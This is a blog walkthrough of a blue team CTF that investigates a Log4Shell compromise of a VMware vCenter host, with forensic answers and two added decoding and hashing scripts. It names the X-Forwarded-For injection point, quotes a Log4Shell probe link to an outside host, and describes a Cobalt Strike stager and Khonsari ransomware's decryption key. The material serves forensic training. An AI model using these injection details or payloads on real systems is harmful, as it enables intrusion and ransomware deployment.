Windows Disk Image Forensics — DetectLog4j (CyberDefenders BlueTeam CTF)

Chenny Ren
7 min read, Feb 9, 2022


On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system. CyberDefenders released a Windows disk forensics challenge built around detecting a Log4j exploitation:

https://cyberdefenders.org/blueteam-ctf-challenges/86

This is a blue team CTF made for security researchers and SOC practitioners to practice their analysis skills.

#1 What is the computer hostname?

Check the Operating System Information artifacts; the hostname is vcw65.

#2 What is the Timezone of the compromised machine?

Open the SYSTEM hive from Windows\System32\config.

Navigate to ControlSet001 > Control > TimeZoneInformation.

Pacific Standard Time: UTC-8

#3 What is the current build number on the system?

Open the SOFTWARE hive from Windows\System32\config.

Navigate to Microsoft > Windows NT > CurrentVersion.

Current build: 14393

#4 What is the computer IP?

Open the SYSTEM hive from Windows\System32\config.

Navigate to ControlSet001 > Services > Tcpip and look at the interface parameters:

DhcpIPAddress REG_SZ 192.168.112.139

#5 What is the domain computer was assigned to?

cyberdefenders.org

Open the SYSTEM hive from Windows\System32\config.

Navigate to ControlSet001 > Services > Tcpip > Winsock.

#6 When was myoussef user created?

Go to OS Accounts in the left column and search for myoussef.

The creation time is shown as 2021-12-28 14:57:23 CST. Submitting that value failed; the challenge expects UTC, so the accepted answer is 2021-12-28 06:57:23 UTC.

#7 What is the user mhasan password hint?

Go to OS Accounts and search for mhasan.

The password hint is: https://www.linkedin.com/in/0xmohamedhasan/

#8 What is the version of the VMware product installed on the machine?

Go to Data Artifacts > Installed Programs.

Search for the VMware product; the version is 6.7.0.40322.

#9 What is the version of the log4j library used by the installed VMware product?

Go to Program Files\VMWare\vCenter Server\common-jars; the bundled jar file names show log4j 2.11.2.

#10 What is the log4j library log level specified in the configuration file?

Keyword search for 'log4j' and open log4j.properties.

The configured log level is INFO.

#11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?

Searching for "vcenter log4j exploit" turns up write-ups stating that "the vulnerability is in the X-Forwarded-For header on the vCenter SSO login page", so the HTTP header is X-Forwarded-For.

#12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?

Keyword search for 'log4shell.huntress.com'.

Open websso.log, which contains the payload:

log4shell.huntress.com:1389/b1292f3c-a652-4240-8fb4-59c43141f55a

#13 When was the first successful login to vsphere WebClient?

Go to ProgramData\VMWare\vCenterServer\runtime\VMWareSTSService\logs and open audit_events.log.

First successful login: 12/28/2021 12:39:29 PST

Submitted in UTC: 28/12/2021 20:39:29 UTC

#14 What is the attacker’s IP address?

The same audit_events.log records the source address of the login: 192.168.112.128

#15 What is the port the attacker used to receive the cobalt strike reverse shell?

Go to Windows\System32\winevt\Logs and open Microsoft-Windows-PowerShell%4Operational.evtx.

Look for a long base64 string in the logged script blocks. The command has the form $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("<base64 blob>")), where the argument is a gzipped script:


Decode it with CyberChef using the recipe From Base64 followed by Gunzip.

Download the decoded command and save it with a .ps1 extension (malscript.ps1 below).

Download FakeNet-NG from https://github.com/mandiant/flare-fakenet-ng

The tool allows you to intercept and redirect all or specific network traffic while simulating legitimate network services. Using FakeNet-NG, malware analysts can quickly identify malware's functionality and capture network signatures. Penetration testers and bug hunters will find FakeNet-NG's configurable interception engine and modular framework highly useful when testing an application's specific functionality and prototyping PoCs.

Run malscript.ps1 in an isolated analysis VM while fakenet.exe is running.

FakeNet-NG shows the script connecting back to the attacker host on port 1337.
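The CyberChef recipe above (From Base64, then Gunzip) as an added Python example, not part of the original write-up. The event line it decodes is a constructed, harmless sample built the same way as the logged command; the regex also tolerates the base64 argument being wrapped across lines, as it was in the log viewer.

```python
import base64
import gzip
import re
from typing import Optional

# Constructed sample: a harmless command, gzipped and base64-encoded the same
# way the FromBase64String payload in the PowerShell event was. It is not the
# stager recovered from the challenge image.
SAMPLE_PLAIN = "Write-Output 'constructed sample, no network activity'"
CONSTRUCTED_EVENT_LINE = (
    '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("'
    + base64.b64encode(gzip.compress(SAMPLE_PLAIN.encode())).decode()
    + '"))'
)

# The base64 argument may be wrapped across lines in the log viewer, so
# whitespace is allowed inside the match and stripped afterwards.
_B64_RE = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=\s]+)["\']', re.I)
GZIP_MAGIC = b"\x1f\x8b"


def extract_base64(ps_line: str) -> Optional[str]:
    """Return the FromBase64String(...) argument with line breaks removed."""
    m = _B64_RE.search(ps_line)
    return re.sub(r"\s+", "", m.group(1)) if m else None


def decode_payload(ps_line: str) -> Optional[str]:
    """Base64-decode the argument and gunzip it when the bytes carry the gzip
    magic: the CyberChef 'From Base64' -> 'Gunzip' recipe in code."""
    b64 = extract_base64(ps_line)
    if b64 is None:
        return None
    raw = base64.b64decode(b64)
    if raw.startswith(GZIP_MAGIC):
        raw = gzip.decompress(raw)
    # Plain scripts are usually ASCII/UTF-8; -EncodedCommand style payloads
    # are UTF-16LE, so fall back to that if UTF-8 decoding fails.
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("utf-16le", errors="replace")


if __name__ == "__main__":
    print(decode_payload(CONSTRUCTED_EVENT_LINE))
```

Decoded output from a real event should only be run inside an isolated sandbox such as the FakeNet-NG VM described above.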

#16 What is the script name published by VMware to mitigate log4shell vulnerability?

vc_log4j_mitigator.py, published in VMware KB 87081: https://kb.vmware.com/s/article/87081

#17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?

log4j2.formatMsgNoLookups

If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.

https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

#18 What is the log4j version which contains a patch to CVE-2021–44228?

2.15.0 (the first release addressing CVE-2021-44228)

#19 Removing JndiLookup.class may help in mitigating log4shell. What is the sha256 hash of the JndiLookup.class?

Go to Program Files\VMWare\vCenter Server\VMWare Identity Services\log4j-core-2.11.2.jar

Extract log4j-core-2.11.2.jar from the image (right click the file).

Unpack the exported jar file (it is a zip archive).

Locate JndiLookup.class under org/apache/logging/log4j/core/lookup.

Get the file hash:

0f038a1e0aa0aff76d66d1440c88a2b35a3d023ad8b2e3bac8e25a3208499f7e
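The manual steps in questions 9 and 19 (read the log4j version off the jar name, open the jar, find JndiLookup.class, hash it) as an added Python example that is not part of the original write-up. The jar it inspects is a constructed stand-in with placeholder class bytes, so the hash it prints is not the one above; point inspect_jar at a jar exported from the image to get the real value.

```python
import hashlib
import io
import re
import zipfile
from typing import Dict, Optional

# Path of the class inside log4j-core whose removal is the mitigation discussed above.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Constructed placeholder bytes standing in for the real class file.
PLACEHOLDER_CLASS_BYTES = b"\xca\xfe\xba\xbe constructed placeholder, not the real class"
_VERSION_RE = re.compile(r"log4j-core-(\d+\.\d+\.\d+)\.jar$")


def jar_version(jar_name: str) -> Optional[str]:
    """Version as read off the jar file name, e.g. log4j-core-2.11.2.jar."""
    m = _VERSION_RE.search(jar_name)
    return m.group(1) if m else None


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def inspect_jar(jar_bytes: bytes, jar_name: str) -> Dict[str, object]:
    """Open the jar as a zip and report whether JndiLookup.class is present
    and, if so, its SHA-256 (the value asked for in question 19)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        present = JNDI_LOOKUP_CLASS in zf.namelist()
        digest = sha256_hex(zf.read(JNDI_LOOKUP_CLASS)) if present else None
    return {"jar": jar_name, "version": jar_version(jar_name),
            "jndi_lookup_present": present, "sha256": digest}


def build_constructed_jar(include_class: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar; a real scan would read the
    exported jar bytes from disk instead."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if include_class:
            zf.writestr(JNDI_LOOKUP_CLASS, PLACEHOLDER_CLASS_BYTES)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_jar(build_constructed_jar(True), "log4j-core-2.11.2.jar"))
```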

#20 Analyze JNDILookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?

Decompile JndiLookup.class from Program Files\VMWare\vCenter Server\cm\lib\log4j-core.jar; the constant is declared as:

static final String CONTAINER_JNDI_RESOURCE_PATH_PREFIX = "java:comp/env/";

#21 What is the executable used by the attacker to gain persistence?

Go to Users\Administrator.WIN-B633EO9K91M and open NTUSER.DAT.

Navigate to SOFTWARE > Microsoft > Windows > CurrentVersion > RunOnce, which holds:

p33r REG_SZ C:\Users\Administrator\Desktop\baaaackdooor.exe

#22 When was the first submission of ransomware to virustotal?

The ransomware is khonsari.exe. Searching for it on VirusTotal shows the first submission at 2021-12-11 22:57:01.

#23 The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?

Search for the sample on the MalwareBazaar database.

Download the malware sample (make sure you do this in a safe environment).

Download dnSpy. dnSpy is a debugger and .NET assembly editor; you can use it to edit and debug assemblies even if you don't have any source code available.

Load the sample into dnSpy.

Right click dorfier and go to the entry point.

The key is the string 'GoaahQrC'.

#24 What is the ISP that owns that IP that serves the text file?

Search for the sample on VirusTotal.

The contacted domain is a cloud server address from Amazon.

#25 The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?

ini

After downloading the string, the malware enumerates drives and mounts them,

then encrypts all contents found.

The article "Khonsari ransomware analysis" describes this behavior in detail.
